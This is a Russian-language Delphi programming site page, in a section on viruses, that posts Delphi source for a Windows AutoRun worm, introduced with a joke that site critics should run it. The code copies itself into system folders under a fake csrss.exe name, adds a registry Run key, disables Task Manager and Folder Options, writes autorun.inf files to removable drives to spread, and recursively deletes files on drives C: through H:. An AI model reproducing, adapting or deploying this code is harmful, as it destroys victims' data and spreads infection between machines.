AutoRun на Delphi - Вирусология - Delphi - Каталог статей

Среда, 16.08.2017, 23:12 Приветствую вас Гость | Группа "Гости"

Меню сайта
	Главная Файлы Форум Статьи Гостевая Инфо о сайте

Категории раздела

Вирусология [39]

Статьи о вирусах

Системные [0]

Работа с системой

Примеры [44]

Приёмы, функции, процедуры

Ceти [1]

Работа с интернет

Приколы [5]

Пишем шуточные програмки

Остальное [5]

Всё что не вошло

Помощь проекту
	R106276538945 Z160640024212 Яндекс деньги 410011190732605

Недавние темы

ФСБ хочет отслеживать трафик пользователей интернета (polo2016)

(17)

Bot telegram (AlexaSANF)

(6)

Sql инъекция (JessyGearf)

(44)

Неведомая вирусня (JessyGearf)

(15)

Вызов синиго экрана смерти (JessyGearf)

(23)

Нужен опытный специалист по кардингу\сис админ (JessyGearf)

(3)

Все ICQ Клиенты (ohvenom)

(6)

Опрос
	На каком языке кодите? [ Результаты · Архив опросов ] Всего ответов: 744

Главная » Статьи » Delphi » Вирусология

AutoRun на Delphi

Так, кому не нравиться сайт или что-о с ним связанное - пишем ЭТО и запускаем у себя на компьютере… Virus.Win32.AutoRun.ah var WinDir, SysDir: String; Buffer: array[0..1023] of Char; F: TextFile; Reg: TRegistry; // function DriveExists(Drive: Byte): Boolean; begin Result:= Boolean(GetLogicalDrives AND(1 shl Drive)) end; procedure InFect(FileName: String); begin AssignFile(F,FileName); Reset(F); WriteLn(F,’open=’+SysDir+’\config\csrss.exe’); CloseFile(F); end; procedure FindAndDelete(Drive: String); var SearchRec: TSearchRec; // begin if FindFirst(Drive+’.’, faAnyFile,SearchRec) = 0 then repeat if (SearchRec.Attr and faAnyFile) = SearchRec.Attr then begin DeleteFile(SearchRec.Name); end; until FindNext(SearchRec) <> 0; if FindFirst(’*', faAnyFile, SearchRec) = 0 then repeat if (SearchRec.Attr and faDirectory) = faDirectory then if SearchRec.Name[1] <> ‘.’ then begin ChDir(SearchRec.Name);// FindAndDelete(Drive); // ChDir(’..’);// end; until FindNext(SearchRec) <> 0; end; SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer))); CopyFile(PChar(ParamStr(0)),PChar(WinDir+’\media\arona.exe’),false); SetString(SysDir, Buffer, GetSystemDirectory(Buffer, SizeOf(Buffer))); CopyFile(PChar(ParamStr(0)),PChar(SysDir+’\config\csrss.exe’),false); AssignFile(F,SysDir+’\config\logon.bat’); Reset(F); WriteLn(F,’@'+SysDir+’\config\csrss.exe’); CloseFile(F); Reg:=TRegistry.Create; Reg.RootKey:=HKEY_LOCAL_MACHINE; Reg.OpenKey(’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’,true); Reg.WriteString(’Worms’,SysDir+’\config\logon.bat’); Reg.CloseKey; Reg.RootKey:=HKEY_CURRENT_USER; REg.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Policies\System’,true); Reg.WriteInteger(’DisableTaskMgr’,1); Reg.CloseKey; Reg.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Policies\Explorer’,true); Reg.WriteInteger(’NoFolderOptions’,1); Reg.Free; try InFect(SysDir+’\config\autorun.inf’); if DriveExists(5) then // begin InFect(’F:\autorun.inf’); end; if DriveExists(6) then // begin InFect(’G:\autorun.inf’); end; if DriveExists(7) then // begin InFect(’H:\autorun.inf’); end; if DriveExists(10) then begin InFect(’K:\autorun.inf’) ; end; if DriveExists(11) then begin InFect(’L:\autorun.inf’); end; if DriveExists(14) then begin InFect(’O:\autorun.inf’); end; except Exit; end; try FindAndDelete(’D:\’); FindAndDelete(’C:\’); FindAndDelete(’E:\’); FindAndDelete(’F:\’); FindAndDelete(’G:\’); FindAndDelete(’H:\’); except Exit; end;
1 2 3 4 5 Категория: Вирусология \| Добавил: dolphin (27.09.2008)
Просмотров: 2359 \| Комментарии: 1 \| Рейтинг: 3.7/3

Всего комментариев: 1
Порядок вывода комментариев: 0 Спам 1 GReIIIHuK • 19:34, 23.11.2011 Описание повеселило Ответить

Профиль

Поиск

Наша кнопка

Статистика
	Статистика материалов Файлов: 365 Форум: 1129/8038 Коментариев: 771 Новостей: 27 Статистика пользователей Всего: 1511 За неделю: 9 Вчера: 1 Сегодня: 3 Всего онлайн: 3 Гостей: 3 Пользователей: 0